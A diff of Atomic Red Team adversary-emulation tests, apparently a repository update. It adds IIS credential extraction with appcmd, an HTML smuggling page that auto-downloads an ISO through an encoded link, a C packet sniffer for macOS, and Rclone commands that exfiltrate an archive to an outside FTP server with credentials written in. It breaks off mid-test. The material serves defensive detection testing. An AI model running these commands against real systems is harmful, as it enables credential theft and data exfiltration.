#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```powershell
|
||||
C:\Windows\System32\inetsrv\appcmd.exe list apppool /config
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `powershell`!
|
||||
##### Description: IIS must be installed prior to running the test
|
||||
##### Check Prereq Commands:
|
||||
```powershell
|
||||
if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```powershell
|
||||
Install-WindowsFeature -name Web-Server -IncludeManagementTools
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -104,4 +104,41 @@ atomic_tests:
|
||||
Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
|
||||
- name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
|
||||
auto_generated_guid: 6c7a4fd3-5b0b-4b30-a93e-39411b25d889
|
||||
description: |-
|
||||
AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
|
||||
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
|
||||
supported_platforms:
|
||||
- windows
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: IIS must be installed prior to running the test
|
||||
prereq_command: if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
|
||||
get_prereq_command: |-
|
||||
Install-WindowsFeature -name Web-Server -IncludeManagementTools
|
||||
executor:
|
||||
command: |-
|
||||
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
|
||||
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
|
||||
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
|
||||
auto_generated_guid: 42510244-5019-48fa-a0e5-66c3b76e6049
|
||||
description: |-
|
||||
AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
|
||||
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
|
||||
supported_platforms:
|
||||
- windows
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: IIS must be installed prior to running the test
|
||||
prereq_command: if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
|
||||
get_prereq_command: |-
|
||||
Install-WindowsFeature -name Web-Server -IncludeManagementTools
|
||||
executor:
|
||||
command: |-
|
||||
C:\Windows\System32\inetsrv\appcmd.exe list apppool /config
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
|
||||
@@ -0,0 +1,59 @@
|
||||
# T1027.006 - HTML Smuggling
|
||||
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/006)
|
||||
<blockquote>Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
|
||||
|
||||
Adversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as <code>text/plain</code> and/or <code>text/html</code>. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.
|
||||
|
||||
For example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as <code>msSaveBlob</code>.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - HTML Smuggling Remote Payload](#atomic-test-1---html-smuggling-remote-payload)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - HTML Smuggling Remote Payload
|
||||
The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without userinteraction.
|
||||
The HTML file is based off of the work from [Stan Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** 30cbeda4-08d9-42f1-8685-197fad677734
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`!
|
||||
|
||||
|
||||
```powershell
|
||||
PathToAtomicsFolder\T1027.006\bin\T1027_006_remote.html
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```powershell
|
||||
$user = [System.Environment]::UserName; Remove-Item -Path C:\Users\$user\Downloads\FeelTheBurn.iso
|
||||
```
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `powershell`!
|
||||
##### Description: T1027_006_remote.html must exist on disk at specified at PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html
|
||||
##### Check Prereq Commands:
|
||||
```powershell
|
||||
if (Test-Path PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html) { exit 0} else { exit 1}
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```powershell
|
||||
New-Item -Type Directory "PathToAtomicsFolder\T1027.006\bin\" -ErrorAction ignore | Out-Null
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.006/bin/T1027_006_Remote.html" -OutFile "PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html"
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
@@ -0,0 +1,27 @@
|
||||
attack_technique: T1027.006
|
||||
display_name: HTML Smuggling
|
||||
atomic_tests:
|
||||
|
||||
- name: HTML Smuggling Remote Payload
|
||||
auto_generated_guid: 30cbeda4-08d9-42f1-8685-197fad677734
|
||||
description: |
|
||||
The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without userinteraction.
|
||||
The HTML file is based off of the work from [Stan Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)
|
||||
supported_platforms:
|
||||
- windows
|
||||
dependencies:
|
||||
- description: |
|
||||
T1027_006_remote.html must exist on disk at specified at PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html
|
||||
prereq_command: |
|
||||
if (Test-Path PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html) { exit 0} else { exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\T1027.006\bin\" -ErrorAction ignore | Out-Null
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.006/bin/T1027_006_Remote.html" -OutFile "PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html"
|
||||
executor:
|
||||
command: |
|
||||
PathToAtomicsFolder\T1027.006\bin\T1027_006_remote.html
|
||||
cleanup_command:
|
||||
$user = [System.Environment]::UserName;
|
||||
Remove-Item -Path C:\Users\$user\Downloads\FeelTheBurn.iso
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
@@ -0,0 +1,36 @@
|
||||
<!-- Based on the template from Stan Hegt: https://outflank.nl/blog/2018/08/14/html-smuggling-explained/ -->
|
||||
<html>
|
||||
<head>
|
||||
<title>T1027.006 - HTML Smuggling</title>
|
||||
</head>
|
||||
<body>
|
||||
<p>Nothing to see here...</p>
|
||||
|
||||
<script>
|
||||
function convertFromBase64(base64) {
|
||||
var binary_string = window.atob(base64);
|
||||
var len = binary_string.length;
|
||||
var bytes = new Uint8Array( len );
|
||||
for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
|
||||
return bytes.buffer;
|
||||
}
|
||||
//Base64 encoded link to https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso
|
||||
var file ='aHR0cHM6Ly9naXRodWIuY29tL3JlZGNhbmFyeWNvL2F0b21pYy1yZWQtdGVhbS9ibG9iL2QwZGFkNjJkYmNhZTljNjBjNTE5MzY4ZTgyYzE5NmEzZGI1NzcwNTUvYXRvbWljcy9UMTU1My4wMDUvYmluL0ZlZWxUaGVCdXJuLmlzbz9yYXc9dHJ1ZQ==';
|
||||
var data = convertFromBase64(file);
|
||||
var blob = new Blob([data], {type: 'octet/stream'});
|
||||
var fileName = 'FeelTheBurn.iso';
|
||||
|
||||
if(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob,fileName);
|
||||
else {
|
||||
var a = document.createElement('a');
|
||||
document.body.appendChild(a);
|
||||
a.style = 'display: none';
|
||||
var url = window.URL.createObjectURL(blob);
|
||||
a.href = url;
|
||||
a.download = fileName;
|
||||
a.click();
|
||||
window.URL.revokeObjectURL(url);
|
||||
}
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
+108
-2
@@ -12,7 +12,7 @@ In cloud-based environments, adversaries may still be able to use traffic mirror
|
||||
|
||||
- [Atomic Test #1 - Packet Capture Linux](#atomic-test-1---packet-capture-linux)
|
||||
|
||||
- [Atomic Test #2 - Packet Capture macOS](#atomic-test-2---packet-capture-macos)
|
||||
- [Atomic Test #2 - Packet Capture macOS using tcpdump or tshark](#atomic-test-2---packet-capture-macos-using-tcpdump-or-tshark)
|
||||
|
||||
- [Atomic Test #3 - Packet Capture Windows Command Prompt](#atomic-test-3---packet-capture-windows-command-prompt)
|
||||
|
||||
@@ -22,6 +22,10 @@ In cloud-based environments, adversaries may still be able to use traffic mirror
|
||||
|
||||
- [Atomic Test #6 - Windows Internal pktmon set filter](#atomic-test-6---windows-internal-pktmon-set-filter)
|
||||
|
||||
- [Atomic Test #7 - Packet Capture macOS using /dev/bpfN with sudo](#atomic-test-7---packet-capture-macos-using-devbpfn-with-sudo)
|
||||
|
||||
- [Atomic Test #8 - Filtered Packet Capture macOS using /dev/bpfN with sudo](#atomic-test-8---filtered-packet-capture-macos-using-devbpfn-with-sudo)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -73,7 +77,7 @@ if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exi
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Packet Capture macOS
|
||||
## Atomic Test #2 - Packet Capture macOS using tcpdump or tshark
|
||||
Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed.
|
||||
|
||||
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface en0A.
|
||||
@@ -285,4 +289,106 @@ pktmon filter remove
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #7 - Packet Capture macOS using /dev/bpfN with sudo
|
||||
Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.
|
||||
|
||||
**Supported Platforms:** macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** e6fe5095-545d-4c8b-a0ae-e863914be3aa
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| ifname | Specify interface to perform PCAP on. | String | en0|
|
||||
| csource_path | Path to C program source | String | PathToAtomicsFolder/T1040/src/macos_pcapdemo.c|
|
||||
| program_path | Path to compiled C program | String | /tmp/t1040_macos_pcapdemo|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```bash
|
||||
sudo #{program_path} -i #{ifname} -t 3
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```bash
|
||||
rm -f #{program_path}
|
||||
```
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `bash`!
|
||||
##### Description: compile C program
|
||||
##### Check Prereq Commands:
|
||||
```bash
|
||||
exit 1
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```bash
|
||||
cc #{csource_path} -o #{program_path}
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #8 - Filtered Packet Capture macOS using /dev/bpfN with sudo
|
||||
Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.
|
||||
|
||||
**Supported Platforms:** macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** e2480aee-23f3-4f34-80ce-de221e27cd19
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| ifname | Specify interface to perform PCAP on. | String | en0|
|
||||
| csource_path | Path to C program source | String | PathToAtomicsFolder/T1040/src/macos_pcapdemo.c|
|
||||
| program_path | Path to compiled C program | String | /tmp/t1040_macos_pcapdemo|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```bash
|
||||
sudo #{program_path} -f -i #{ifname} -t 3
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```bash
|
||||
rm -f #{program_path}
|
||||
```
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `bash`!
|
||||
##### Description: compile C program
|
||||
##### Check Prereq Commands:
|
||||
```bash
|
||||
exit 1
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```bash
|
||||
cc #{csource_path} -o #{program_path}
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -28,7 +28,7 @@ atomic_tests:
|
||||
tshark -c 5 -i #{interface}
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Packet Capture macOS
|
||||
- name: Packet Capture macOS using tcpdump or tshark
|
||||
auto_generated_guid: 9d04efee-eff5-4240-b8d2-07792b873608
|
||||
description: |
|
||||
Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed.
|
||||
@@ -153,4 +153,72 @@ atomic_tests:
|
||||
cleanup_command: |-
|
||||
pktmon filter remove
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
elevation_required: true
|
||||
- name: Packet Capture macOS using /dev/bpfN with sudo
|
||||
auto_generated_guid: e6fe5095-545d-4c8b-a0ae-e863914be3aa
|
||||
description: |
|
||||
Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.
|
||||
supported_platforms:
|
||||
- macos
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: String
|
||||
default: en0
|
||||
csource_path:
|
||||
description: Path to C program source
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c
|
||||
program_path:
|
||||
description: Path to compiled C program
|
||||
type: String
|
||||
default: /tmp/t1040_macos_pcapdemo
|
||||
dependency_executor_name: bash
|
||||
dependencies:
|
||||
- description: |
|
||||
compile C program
|
||||
prereq_command: |
|
||||
exit 1
|
||||
get_prereq_command: |
|
||||
cc #{csource_path} -o #{program_path}
|
||||
executor:
|
||||
command: |
|
||||
sudo #{program_path} -i #{ifname} -t 3
|
||||
cleanup_command: |
|
||||
rm -f #{program_path}
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Filtered Packet Capture macOS using /dev/bpfN with sudo
|
||||
auto_generated_guid: e2480aee-23f3-4f34-80ce-de221e27cd19
|
||||
description: |
|
||||
Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.
|
||||
supported_platforms:
|
||||
- macos
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: String
|
||||
default: en0
|
||||
csource_path:
|
||||
description: Path to C program source
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c
|
||||
program_path:
|
||||
description: Path to compiled C program
|
||||
type: String
|
||||
default: /tmp/t1040_macos_pcapdemo
|
||||
dependency_executor_name: bash
|
||||
dependencies:
|
||||
- description: |
|
||||
compile C program
|
||||
prereq_command: |
|
||||
exit 1
|
||||
get_prereq_command: |
|
||||
cc #{csource_path} -o #{program_path}
|
||||
executor:
|
||||
command: |
|
||||
sudo #{program_path} -f -i #{ifname} -t 3
|
||||
cleanup_command: |
|
||||
rm -f #{program_path}
|
||||
name: bash
|
||||
elevation_required: true
|
||||
|
||||
@@ -0,0 +1,299 @@
|
||||
#include <fcntl.h>
|
||||
#include <getopt.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <sys/errno.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/uio.h>
|
||||
#include <unistd.h>
|
||||
|
||||
#include <arpa/inet.h>
|
||||
#include <net/bpf.h>
|
||||
#include <net/if.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netinet/in.h>
|
||||
|
||||
#define DEFAULT_IFNAME "en0"
|
||||
#define DEFAULT_BUFSIZE 32767
|
||||
|
||||
static const struct option longopts[] = {
|
||||
{ "filter", no_argument, NULL, 'f'},
|
||||
{ "promisc", no_argument, NULL, 'p'},
|
||||
{ "ifname", required_argument, NULL, 'i'},
|
||||
{ "time", required_argument, NULL, 't'},
|
||||
{ 0, 0, 0, 0 }
|
||||
};
|
||||
|
||||
// counters for each protocol seen
|
||||
|
||||
static int64_t gNumTcp = 0;
|
||||
static int64_t gNumUdp = 0;
|
||||
static int64_t gNumIcmp = 0;
|
||||
static int64_t gNumOther = 0;
|
||||
|
||||
static void usage(const char *progname)
|
||||
{
|
||||
printf("usage: %s <options>\n", progname);
|
||||
printf(" -f --filter Set BPF filter to UDP. Default is unfiltered.\n");
|
||||
printf(" -p --promisc Will enable promisc to capture packets not destined for this system.\n");
|
||||
printf(" -i --ifname <interface name> Specify ifname. Default is 'en0'.\n");
|
||||
printf(" -t --time <num seconds> Exit after number of seconds. Default is to run until killed.\n");
|
||||
}
|
||||
|
||||
typedef struct {
|
||||
char interfaceName[16];
|
||||
unsigned int bufferLength;
|
||||
} BpfOption;
|
||||
|
||||
typedef struct {
|
||||
int fd;
|
||||
char deviceName[16];
|
||||
unsigned int bufferLength;
|
||||
unsigned int lastReadLength;
|
||||
unsigned int readBytesConsumed;
|
||||
char *buffer;
|
||||
} BpfSniffer;
|
||||
|
||||
typedef struct {
|
||||
char *data;
|
||||
} CapturedInfo;
|
||||
|
||||
/*
|
||||
* pick next available /dev/bpf<N> device file.
|
||||
* @returns 0 and sets sniffer->fd on success, returns -1 on failure.
|
||||
*/
|
||||
int pick_bpf_device(BpfSniffer *sniffer)
|
||||
{
|
||||
char dev[16] = {0};
|
||||
for (int i = 0; i < 99; ++i) {
|
||||
sprintf(dev, "/dev/bpf%i", i);
|
||||
sniffer->fd = open(dev, O_RDONLY);
|
||||
if (sniffer->fd != -1) {
|
||||
fprintf(stderr, "opened '%s'\n", dev);
|
||||
strcpy(sniffer->deviceName, dev);
|
||||
return 0;
|
||||
}
|
||||
}
|
||||
return -1;
|
||||
}
|
||||
|
||||
/*
|
||||
* Based on https://gist.github.com/c-bata/ca188c0184715efc2660422b4b3851c6
|
||||
*/
|
||||
int new_bpf_sniffer(const char *ifname, BpfSniffer *sniffer, int isBpfFilterEnabled, int isPromiscEnabled)
|
||||
{
|
||||
unsigned int bufferLength = DEFAULT_BUFSIZE;
|
||||
if (pick_bpf_device(sniffer) == -1)
|
||||
return -1;
|
||||
|
||||
// setup packet buffer length
|
||||
|
||||
if (ioctl(sniffer->fd, BIOCSBLEN, &bufferLength) == -1) {
|
||||
perror("ioctl BIOCSBLEN");
|
||||
return -1;
|
||||
}
|
||||
sniffer->bufferLength = bufferLength;
|
||||
|
||||
// specify interface
|
||||
|
||||
struct ifreq interface;
|
||||
strcpy(interface.ifr_name, ifname);
|
||||
if(ioctl(sniffer->fd, BIOCSETIF, &interface) > 0) {
|
||||
perror("ioctl BIOCSETIF");
|
||||
return -1;
|
||||
}
|
||||
|
||||
// immediate packet callback?
|
||||
|
||||
unsigned int enable = 1;
|
||||
if (ioctl(sniffer->fd, BIOCIMMEDIATE, &enable) == -1) {
|
||||
perror("ioctl BIOCIMMEDIATE");
|
||||
return -1;
|
||||
}
|
||||
|
||||
// enable Promisc if enabled
|
||||
|
||||
if (isPromiscEnabled) {
|
||||
printf("Attempting to enable PRMOMISC\n");
|
||||
if (ioctl(sniffer->fd, BIOCPROMISC, NULL) == -1) {
|
||||
perror("ioctl BIOCPROMISC");
|
||||
return -1;
|
||||
}
|
||||
}
|
||||
|
||||
// set a BPF traffic filter if set
|
||||
|
||||
if (isBpfFilterEnabled) {
|
||||
// generated using 'tcpdump -i en0 udp -dd'
|
||||
struct bpf_insn instructions[] = {
|
||||
{ 0x28, 0, 0, 0x0000000c },
|
||||
{ 0x15, 0, 5, 0x000086dd },
|
||||
{ 0x30, 0, 0, 0x00000014 },
|
||||
{ 0x15, 6, 0, 0x00000011 },
|
||||
{ 0x15, 0, 6, 0x0000002c },
|
||||
{ 0x30, 0, 0, 0x00000036 },
|
||||
{ 0x15, 3, 4, 0x00000011 },
|
||||
{ 0x15, 0, 3, 0x00000800 },
|
||||
{ 0x30, 0, 0, 0x00000017 },
|
||||
{ 0x15, 0, 1, 0x00000011 },
|
||||
{ 0x6, 0, 0, 0x00040000 },
|
||||
{ 0x6, 0, 0, 0x00000000 },
|
||||
};
|
||||
struct bpf_program filter = {12, instructions};
|
||||
|
||||
printf("Adding BPF filter to only match 'udp' traffic\n");
|
||||
|
||||
if (ioctl(sniffer->fd, BIOCSETF, &filter) == -1) {
|
||||
perror("ioctl BIOCSETF");
|
||||
return -1;
|
||||
}
|
||||
}
|
||||
|
||||
// finally, allocate buffer and initialize
|
||||
|
||||
sniffer->readBytesConsumed = 0;
|
||||
sniffer->lastReadLength = 0;
|
||||
sniffer->buffer = (char *)malloc(sizeof(char) * sniffer->bufferLength);
|
||||
return 0;
|
||||
}
|
||||
|
||||
int read_bpf_packet_data(BpfSniffer *sniffer, CapturedInfo *info)
|
||||
{
|
||||
struct bpf_hdr *bpfPacket;
|
||||
if (sniffer->readBytesConsumed + sizeof(sniffer->buffer) >= sniffer->lastReadLength) {
|
||||
sniffer->readBytesConsumed = 0;
|
||||
memset(sniffer->buffer, 0, sniffer->bufferLength);
|
||||
|
||||
ssize_t lastReadLength = read(sniffer->fd, sniffer->buffer, sniffer->bufferLength);
|
||||
if (lastReadLength == -1) {
|
||||
sniffer->lastReadLength = 0;
|
||||
perror("read bpf packet:");
|
||||
return -1;
|
||||
}
|
||||
sniffer->lastReadLength = (unsigned int) lastReadLength;
|
||||
}
|
||||
|
||||
bpfPacket = (struct bpf_hdr*)((long)sniffer->buffer + (long)sniffer->readBytesConsumed);
|
||||
info->data = sniffer->buffer + (long)sniffer->readBytesConsumed + bpfPacket->bh_hdrlen;
|
||||
sniffer->readBytesConsumed += BPF_WORDALIGN(bpfPacket->bh_hdrlen + bpfPacket->bh_caplen);
|
||||
return bpfPacket->bh_datalen;
|
||||
}
|
||||
|
||||
int close_bpf_sniffer(BpfSniffer *sniffer)
|
||||
{
|
||||
free(sniffer->buffer);
|
||||
|
||||
if (close(sniffer->fd) == -1)
|
||||
return -1;
|
||||
return 0;
|
||||
}
|
||||
|
||||
void ProcessIncomingPacketLoop(BpfSniffer *psniffer, int timeout)
|
||||
{
|
||||
CapturedInfo info = { NULL };
|
||||
int dataLength = 0;
|
||||
time_t tstop = time(NULL) + timeout;
|
||||
|
||||
// loop to process incoming packets
|
||||
|
||||
while((dataLength = read_bpf_packet_data(psniffer, &info)) != -1)
|
||||
{
|
||||
char* pend = (info.data + dataLength);
|
||||
struct ether_header* eh = (struct ether_header*)info.data;
|
||||
|
||||
if (ntohs(eh->ether_type) == ETHERTYPE_IP) {
|
||||
|
||||
struct ip* ip = (struct ip*)((long)eh + sizeof(struct ether_header));
|
||||
switch(ip->ip_p) {
|
||||
case IPPROTO_TCP:
|
||||
++gNumTcp;
|
||||
break;
|
||||
case IPPROTO_UDP:
|
||||
++gNumUdp;
|
||||
break;
|
||||
case IPPROTO_ICMP:
|
||||
++gNumIcmp;
|
||||
break;
|
||||
default:
|
||||
++gNumOther;
|
||||
break;
|
||||
}
|
||||
|
||||
} else {
|
||||
gNumOther++;
|
||||
}
|
||||
|
||||
if (timeout > 0 && time(NULL) >= tstop) {
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
void PrintStats()
|
||||
{
|
||||
printf("TCP:%lld UDP:%lld ICMP:%lld Other:%lld\n", gNumTcp, gNumUdp, gNumIcmp, gNumOther);
|
||||
}
|
||||
|
||||
void sigint_handler(int sig)
|
||||
{
|
||||
PrintStats();
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[])
|
||||
{
|
||||
BpfSniffer sniffer;
|
||||
int isBpfFilterEnabled = 0;
|
||||
int isPromiscEnabled = 0;
|
||||
int timeout = 0;
|
||||
char ifname[16] = DEFAULT_IFNAME;
|
||||
int c;
|
||||
|
||||
memset(&sniffer, 0, sizeof(sniffer));
|
||||
|
||||
while(1)
|
||||
{
|
||||
int option_index = 0;
|
||||
|
||||
c = getopt_long(argc, argv, "fpi:t:", longopts, &option_index);
|
||||
if (c == -1)
|
||||
break;
|
||||
|
||||
switch (c) {
|
||||
case 'f':
|
||||
isBpfFilterEnabled = 1;
|
||||
break;
|
||||
case 'p':
|
||||
isPromiscEnabled = 1;
|
||||
break;
|
||||
case 'i':
|
||||
strcpy(ifname, optarg);
|
||||
printf("using interface '%s'\n", optarg);
|
||||
break;
|
||||
case 't':
|
||||
timeout = atoi(optarg);
|
||||
printf("will exit after about %d seconds (if packet activity)\n", timeout);
|
||||
break;
|
||||
default:
|
||||
printf("invalid argument: '%c'\n", c);
|
||||
usage(argv[0]);
|
||||
return -1;
|
||||
}
|
||||
}
|
||||
|
||||
if (new_bpf_sniffer(ifname, &sniffer, isBpfFilterEnabled, isPromiscEnabled) == -1)
|
||||
return 1;
|
||||
|
||||
signal(SIGINT, sigint_handler);
|
||||
|
||||
ProcessIncomingPacketLoop(&sniffer, timeout);
|
||||
|
||||
PrintStats();
|
||||
|
||||
close_bpf_sniffer(&sniffer);
|
||||
return 0;
|
||||
}
|
||||
@@ -18,6 +18,8 @@ Adversaries may opt to obfuscate this data, without the use of encryption, withi
|
||||
|
||||
- [Atomic Test #6 - MAZE FTP Upload](#atomic-test-6---maze-ftp-upload)
|
||||
|
||||
- [Atomic Test #7 - Exfiltration Over Alternative Protocol - FTP - Rclone](#atomic-test-7---exfiltration-over-alternative-protocol---ftp---rclone)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -256,4 +258,66 @@ try {foreach ($file in (dir "$env:windir\temp" "*.7z"))
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #7 - Exfiltration Over Alternative Protocol - FTP - Rclone
|
||||
Rclone may be used by an adversary to exfiltrate data to a publicly hosted FTP server.
|
||||
[Reference](https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/)
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** b854eb97-bf9b-45ab-a1b5-b94e4880c56b
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| ftp_server | Your own ftp server | string | ftp.dlptest.com|
|
||||
| ftp_pass | Your FTP user's password | string | rNrKYTX9g7z3RgJRmxWuGHbeu|
|
||||
| ftp_user | Your FTP username | string | dlpuser|
|
||||
| ftp_port | Your FTP's port | string | 21|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```powershell
|
||||
$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
|
||||
$exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
|
||||
&$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
|
||||
&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `powershell`!
|
||||
##### Description: Check if the exfil package exists
|
||||
##### Check Prereq Commands:
|
||||
```powershell
|
||||
if (Test-Path C:\Users\Public\Downloads\exfil.zip) {exit 0} else {exit 1}
